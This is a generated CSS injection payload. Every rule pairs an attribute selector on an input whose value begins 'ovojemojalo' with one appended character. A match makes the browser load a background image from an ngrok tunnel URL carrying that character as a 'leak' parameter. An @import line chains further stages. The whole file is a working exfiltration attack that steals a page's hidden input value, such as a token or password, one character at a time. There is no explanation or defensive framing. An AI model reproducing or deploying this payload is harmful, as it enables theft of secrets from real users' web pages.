@import url("http://bc0a37bcf1d5.ngrok.io/?l=13");
input[value="ovojemojalo!"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=!&q=0.9017796922213346");}
input[value="ovojemojalo\""] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\"&q=0.43790433784475113");}
input[value="ovojemojalo#"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=#&q=0.3309828750758159");}
input[value="ovojemojalo$"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=$&q=0.16383977666823668");}
input[value="ovojemojalo%"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=%&q=0.2636056491654377");}
input[value="ovojemojalo&"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&&q=0.9251923104746693");}
input[value="ovojemojalo'"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak='&q=0.29283527614107463");}
input[value="ovojemojalo("] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=(&q=0.8986940917315771");}
input[value="ovojemojalo)"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=)&q=0.5753093921267767");}
input[value="ovojemojalo*"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=*&q=0.02870161764593515");}
input[value="ovojemojalo+"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=+&q=0.13080827981466459");}
input[value="ovojemojalo,"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=,&q=0.813694746755639");}
input[value="ovojemojalo-"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=-&q=0.18993264430910872");}
input[value="ovojemojalo."] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=.&q=0.14708063269365756");}
input[value="ovojemojalo/"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=/&q=0.12148241074584121");}
input[value="ovojemojalo0"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=0&q=0.5461486204535517");}
input[value="ovojemojalo1"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=1&q=0.7253997757355257");}
input[value="ovojemojalo2"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=2&q=0.4198603929849083");}
input[value="ovojemojalo3"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=3&q=0.06286482377114533");}
input[value="ovojemojalo4"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=4&q=0.630938056180206");}
input[value="ovojemojalo5"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=5&q=0.08147901150188686");}
input[value="ovojemojalo6"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=6&q=0.3596731235789725");}
input[value="ovojemojalo7"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=7&q=0.08440945218947626");}
input[value="ovojemojalo8"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=8&q=0.47583183385323236");}
input[value="ovojemojalo9"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=9&q=0.08834818481489015");}
input[value="ovojemojalo:"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=:&q=0.983561559698586");}
input[value="ovojemojalo;"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=;&q=0.8968411705932025");}
input[value="ovojemojalo<"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=<&q=0.7172899775132979");}
input[value="ovojemojalo="] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak==&q=0.34534782088301985");}
input[value="ovojemojalo>"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=>&q=0.19455594767354722");}
input[value="ovojemojalo?"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=?&q=0.565711102631749");}
input[value="ovojemojalo@"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=@&q=0.8901101968729808");}
input[value="ovojemojaloA"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=A&q=0.699460312258029");}
input[value="ovojemojaloB"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=B&q=0.12684003032851288");}
input[value="ovojemojaloC"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=C&q=0.322009543899205");}
input[value="ovojemojaloD"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=D&q=0.5603776829906844");}
input[value="ovojemojaloE"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=E&q=0.1961261079425347");}
input[value="ovojemojaloF"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=F&q=0.6250904825874108");}
input[value="ovojemojaloG"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=G&q=0.12382705072250899");}
input[value="ovojemojaloH"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=H&q=0.8775867104438351");}
input[value="ovojemojaloI"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=I&q=0.01233580864161099");}
input[value="ovojemojaloJ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=J&q=0.5970779093525589");}
input[value="ovojemojaloK"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=K&q=0.8771767942363924");}
input[value="ovojemojaloL"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=L&q=0.4306352854036126");}
input[value="ovojemojaloM"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=M&q=0.38899456372154995");}
input[value="ovojemojaloN"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=N&q=0.44375651627181045");}
input[value="ovojemojaloO"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=O&q=0.8917273166709927");}
input[value="ovojemojaloP"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=P&q=0.46859228021417554");}
input[value="ovojemojaloQ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Q&q=0.7082545605231205");}
input[value="ovojemojaloR"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=R&q=0.18625284218676708");}
input[value="ovojemojaloS"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=S&q=0.20629796800342692");}
input[value="ovojemojaloT"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=T&q=0.32183379481106744");}
input[value="ovojemojaloU"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=U&q=0.08213506839969664");}
input[value="ovojemojaloV"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=V&q=0.40350659219525364");}
input[value="ovojemojaloW"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=W&q=0.8410813248248921");}
input[value="ovojemojaloX"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=X&q=0.4216709141454207");}
input[value="ovojemojaloY"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Y&q=0.02682786569179818");}
input[value="ovojemojaloZ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Z&q=0.9349288744619064");}
input[value="ovojemojalo["] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=[&q=0.38521772339178884");}
input[value="ovojemojalo\\"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\\&q=0.7542183022941622");}
input[value="ovojemojalo]"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=]&q=0.6415752524750644");}
input[value="ovojemojalo^"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=^&q=0.6278224290693635");}
input[value="ovojemojalo_"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=_&q=0.5147753311560934");}
input[value="ovojemojalo`"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=`&q=0.33394605774486497");}
input[value="ovojemojaloa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=a&q=0.8334615615435159");}
input[value="ovojemojalob"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=b&q=0.5965269252029313");}
input[value="ovojemojaloc"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=c&q=0.3618870475111684");}
input[value="ovojemojalod"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=d&q=0.3598659709464691");}
input[value="ovojemojaloe"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=e&q=0.8212045027179058");}
input[value="ovojemojalof"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=f&q=0.2366812906808342");}
input[value="ovojemojalog"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=g&q=0.49581264514586265");}
input[value="ovojemojaloh"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=h&q=0.29699503888769274");}
input[value="ovojemojaloi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=i&q=0.462177130277857");}
input[value="ovojemojaloj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=j&q=0.3206525862966336");}
input[value="ovojemojalok"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=k&q=0.09387524744216869");}
input[value="ovojemojalol"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=l&q=0.9975418104867984");}
input[value="ovojemojalom"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=m&q=0.492630650333721");}
input[value="ovojemojalon"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=n&q=0.8863825351611792");}
input[value="ovojemojaloo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=o&q=0.9953834554709826");}
input[value="ovojemojalop"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=p&q=0.9948165557614301");}
input[value="ovojemojaloq"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=q&q=0.6398278912747639");}
input[value="ovojemojalor"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=r&q=0.6684099401951664");}
input[value="ovojemojalos"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=s&q=0.9030219188024573");}
input[value="ovojemojalot"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=t&q=0.12302039835659451");}
input[value="ovojemojalou"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=u&q=0.4203063352834371");}
input[value="ovojemojalov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=v&q=0.6776285665171775");}
input[value="ovojemojalow"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=w&q=0.989963386451113");}
input[value="ovojemojalox"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=x&q=0.5924149404966428");}
input[value="ovojemojaloy"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=y&q=0.42848530052214784");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=z&q=0.7941002778027988");}
input[value="ovojemojalo{"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak={&q=0.9709115472564642");}
input[value="ovojemojalo|"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=|&q=0.8508098658640526");}
input[value="ovojemojalo}"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=}&q=0.4862047036791757");}
input[value="ovojemojalo~"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=~&q=0.7514517163762482");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.35085426712872403");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.20130869515749628");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8171747955988655");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.620017766141455");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4918361673235663");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8460069929843417");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2585282209258797");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7757357503307769");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6475087259737866");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.11275431345155917");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8922511091211369");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.471376740566124");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9276546958897465");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9189585984118136");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6715952336865958");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2441468797045585");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9795163292916393");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9998322405109521");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.23159453971626687");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7790778370286677");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.08231336329131289");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.31158590229277316");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2377167910617013");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2607091853012271");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6737309431835998");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.19075259181122828");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.25318297659642175");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4811988592507206");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.24243438291489805");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.1611364521343972");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9822144588633048");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8003603268884578");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.48046332855072715");}
input[value="ovojemojalo "] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak= &q=0.5489649319652707");}
input[value="ovojemojalo¡"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¡&q=0.24044813869008785");}
input[value="ovojemojalo¢"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¢&q=0.658599974683391");}
input[value="ovojemojalo£"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=£&q=0.9535459442524508");}
input[value="ovojemojalo¤"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¤&q=0.18068851434604016");}
input[value="ovojemojalo¥"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¥&q=0.06769509405308138");}
input[value="ovojemojalo¦"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¦&q=0.22186771998643784");}
input[value="ovojemojalo§"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=§&q=0.8895257386606845");}
input[value="ovojemojalo¨"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¨&q=0.1719792492430421");}
input[value="ovojemojalo©"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=©&q=0.36277712270115137");}
input[value="ovojemojaloª"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ª&q=0.7103546264983707");}
input[value="ovojemojalo«"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=«&q=0.18937589689671674");}
input[value="ovojemojalo¬"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¬&q=0.28555728007858305");}
input[value="ovojemojalo­"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=­&q=0.6867385597332734");}
input[value="ovojemojalo®"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=®&q=0.45974794876586733");}
input[value="ovojemojalo¯"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¯&q=0.7115301996713368");}
input[value="ovojemojalo°"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=°&q=0.758994640827817");}
input[value="ovojemojalo±"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=±&q=0.7421411061339929");}
input[value="ovojemojalo²"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=²&q=0.13344441026459508");}
input[value="ovojemojalo³"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=³&q=0.9534193814811056");}
input[value="ovojemojalo´"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=´&q=0.69289325470017");}
input[value="ovojemojaloµ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=µ&q=0.2695239154809277");}
input[value="ovojemojalo¶"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¶&q=0.672471385560508");}
input[value="ovojemojalo·"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=·&q=0.23870036526012872");}
input[value="ovojemojalo¸"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¸&q=0.4804530229231696");}
input[value="ovojemojalo¹"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¹&q=0.6355040790616");}
input[value="ovojemojaloº"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=º&q=0.6782711183809293");}
input[value="ovojemojalo»"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=»&q=0.7400587541766972");}
input[value="ovojemojalo¼"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¼&q=0.6332147004968967");}
input[value="ovojemojalo½"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=½&q=0.8659523678963026");}
input[value="ovojemojalo¾"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¾&q=0.6237105563595964");}
input[value="ovojemojalo¿"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¿&q=0.16139380428010242");}
input[value="ovojemojaloÀ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=À&q=0.31464276095305");}
input[value="ovojemojaloÁ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Á&q=0.2609640797594279");}
input[value="ovojemojaloÂ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Â&q=0.5074714926821182");}
input[value="ovojemojaloÃ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ã&q=0.3895525806155744");}
input[value="ovojemojaloÄ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ä&q=0.22600727935463993");}
input[value="ovojemojaloÅ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Å&q=0.7600679039105229");}
input[value="ovojemojaloÆ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Æ&q=0.030507265040190523");}
input[value="ovojemojaloÇ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ç&q=0.6111458054515189");}
input[value="ovojemojaloÈ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=È&q=0.7022346423995462");}
input[value="ovojemojaloÉ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=É&q=0.09465539347653307");}
input[value="ovojemojaloÊ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ê&q=0.8989347849745386");}
input[value="ovojemojaloË"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ë&q=0.8169831032388057");}
input[value="ovojemojaloÌ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ì&q=0.7868660211093736");}
input[value="ovojemojaloÍ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Í&q=0.704152671068244");}
input[value="ovojemojaloÎ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Î&q=0.30731601988550494");}
input[value="ovojemojaloÏ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ï&q=0.327898895558679");}
input[value="ovojemojaloÐ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ð&q=0.6645567683278837");}
input[value="ovojemojaloÑ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ñ&q=0.7360565253686937");}
input[value="ovojemojaloÒ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ò&q=0.8765101701322813");}
input[value="ovojemojaloÓ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ó&q=0.9822910312308997");}
input[value="ovojemojaloÔ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ô&q=0.21693371177706733");}
input[value="ovojemojaloÕ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Õ&q=0.6986095277207802");}
input[value="ovojemojaloÖ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ö&q=0.615105136364839");}
input[value="ovojemojalo×"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=×&q=0.32813162410954555");}
input[value="ovojemojaloØ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ø&q=0.9019185530558931");}
input[value="ovojemojaloÙ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ù&q=0.4203952467873293");}
input[value="ovojemojaloÚ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ú&q=0.5925528058124201");}
input[value="ovojemojaloÛ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Û&q=0.3588977104543898");}
input[value="ovojemojaloÜ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ü&q=0.8930422236861315");}
input[value="ovojemojaloÝ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ý&q=0.27445654007073084");}
input[value="ovojemojaloÞ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Þ&q=0.9688938937215716");}
input[value="ovojemojaloß"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ß&q=0.04664669612160277");}
input[value="ovojemojaloà"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=à&q=0.06273795953785521");}
input[value="ovojemojaloá"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=á&q=0.2738223994115938");}
input[value="ovojemojaloâ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=â&q=0.6604967758525722");}
input[value="ovojemojaloã"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ã&q=0.7194527733022924");}
input[value="ovojemojaloä"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ä&q=0.6848855456381886");}
input[value="ovojemojaloå"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=å&q=0.5413819757475062");}
input[value="ovojemojaloæ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=æ&q=0.9566594274117219");}
input[value="ovojemojaloç"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ç&q=0.041859077838160674");}
input[value="ovojemojaloè"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=è&q=0.5234966797792346");}
input[value="ovojemojaloé"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=é&q=0.19098058723481737");}
input[value="ovojemojaloê"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ê&q=0.05842010972623002");}
input[value="ovojemojaloë"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ë&q=0.49715094582659036");}
input[value="ovojemojaloì"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ì&q=0.4414175751735594");}
input[value="ovojemojaloí"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=í&q=0.20919021925820913");}
input[value="ovojemojaloî"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=î&q=0.5217634142074952");}
input[value="ovojemojaloï"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ï&q=0.6812514852747522");}
input[value="ovojemojaloð"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ð&q=0.2521442895258903");}
input[value="ovojemojaloñ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ñ&q=0.06757915506730883");}
input[value="ovojemojaloò"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ò&q=0.8017384898176498");}
input[value="ovojemojaloó"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ó&q=0.8113469269741582");}
input[value="ovojemojaloô"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ô&q=0.4947699189854702");}
input[value="ovojemojaloõ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=õ&q=0.3134384603128537");}
input[value="ovojemojaloö"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ö&q=0.5810765114249692");}
input[value="ovojemojalo÷"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=÷&q=0.7077291352343682");}
input[value="ovojemojaloø"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ø&q=0.8284047589526133");}
input[value="ovojemojaloù"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ù&q=0.31303027534043615");}
input[value="ovojemojaloú"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ú&q=0.24692770810286446");}
input[value="ovojemojaloû"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=û&q=0.9172133239787528");}
input[value="ovojemojaloü"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ü&q=0.22266750617806852");}
input[value="ovojemojaloý"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ý&q=0.12745747493575266");}
input[value="ovojemojaloþ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=þ&q=0.9029383660543151");}
input[value="ovojemojaloÿ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ÿ&q=0.3337203939684181");}
